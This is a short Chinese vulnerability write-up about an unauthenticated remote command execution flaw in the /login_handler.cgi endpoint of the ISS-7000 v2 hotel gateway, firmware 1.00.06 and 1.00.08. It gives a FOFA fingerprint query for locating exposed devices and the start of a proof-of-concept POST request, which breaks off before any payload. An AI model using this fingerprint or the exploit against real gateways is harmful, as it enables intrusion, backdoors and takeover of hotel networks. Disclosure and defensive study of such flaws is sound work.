0x01 产品简介

瀚霖科技股份有限公司ISS-7000 v2网络网关服务器是台高性能的网关，提供各类酒店网络认证计费的完整解决方案。由于智慧手机与平板电脑日渐普及，人们工作之时开始使用随身携带的设备，因此无线网络也成为网络使用者基本服务的项目。ISS-7000 v2可登录300至1000终端设备同时上网，并发量是一般设备的好几倍。为了提供安全上网服务，本公司专利技术所设计的动态使用者帐户生成器，能避免非使用者侵入酒店内部网络。

0x02 漏洞概述

瀚霖科技股份有限公司ISS-7000 v2网络网关服务器 /login_handler.cgi接口存在远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统命令，写入后门文件，获取服务器权限。

0x03 影响范围

ISS-7000 v2固件版本1.00.06 、1.00.08

0x04 复现环境

FOFA：icon_hash="-842942564"

0x05 漏洞复现

PoC

POST /login_handler.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Win